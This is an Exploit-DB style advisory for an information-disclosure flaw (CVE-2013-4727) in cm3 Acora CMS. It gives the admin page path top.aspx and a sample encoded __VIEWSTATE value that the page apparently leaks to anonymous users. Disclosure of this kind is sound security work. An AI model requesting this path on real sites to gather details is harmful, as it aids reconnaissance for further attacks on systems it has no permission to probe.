cm3 Acora CMS 'top.aspx' Information Disclosure Vulnerability

2013-08-26T00:00:00
ID EDB-ID:38740
Type exploitdb
Reporter Pedro Andujar
Modified 2013-08-26T00:00:00

Description

cm3 Acora CMS 'top.aspx' Information Disclosure Vulnerability. CVE-2013-4727. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/62010/info

cm3 Acora CMS is prone to an information-disclosure vulnerability.

Successful exploits of this issue lead to disclosure of sensitive information which may aid in launching further attacks. 

http://www.example.com/AcoraCMS/Admin/top.aspx

<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTQ4NjIxMDUxOQ9kFgJmD2QWAgIDD2QWAgIBD2QWCmYPFgIeBFRleHQFJERpZ2l0YWxTZWMgTmV0d29ya3MgV2Vic2l0ZWQCAQ8WAh8ABQpFbnRlcnByaXNlZAICDw8WAh8ABQt2NS40LjUvNGEtY2RkAgMPFgIfAAUgQW5vbnltb3VzIChQdWJsaWMgSW50ZXJuZXQgVXNlcilkAgQPDxYCHgdWaXNpYmxlaGRkZIL9u8OSlqqnBHGwtssOBV5lciAoCg" /></div>